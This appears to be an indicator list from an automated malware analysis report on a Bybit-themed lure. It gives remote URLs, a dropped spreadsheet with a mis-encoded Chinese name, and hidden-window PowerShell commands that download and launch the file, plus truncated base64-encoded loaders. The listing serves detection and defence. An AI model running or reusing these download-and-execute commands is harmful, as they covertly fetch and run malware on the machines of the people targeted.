Technical Information
- http://42.###.7.101:8633/1.xls as %temp+/bybitгґв·вґгёвµ„г¦вё…гґвќ• г¤вёšг¦вµв·гґšžгґ…в¬гґв®в¤.xls%
- %TEMP%\bybitГҐВ·ВҐГЁВµ„æ¸…ГҐВЌ• ä¸šГ¦ВµВ·ГҐšžГҐ…¬å®¤.xls
- http://42.###.7.101:8633/1.xls via 42.##9.7.101
- http://42.###.7.101:7255/OAff via 42.##9.7.101
- http://42.###.7.101:7255/j.ad via 42.##9.7.101
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -nop -w hidden (new-object System.Net.WebClient).DownloadFile('http://42.###.7.101:8633/1.xls',$env:temp+'/BybitГҐВ·ВҐГЁВµ„æ¸…ГҐВЌ• ä¸ŠГ¦ВµВ·ГҐŠžГҐ…¬å®¤.xls');Start-Process $env:temp'/B...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASA...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASA...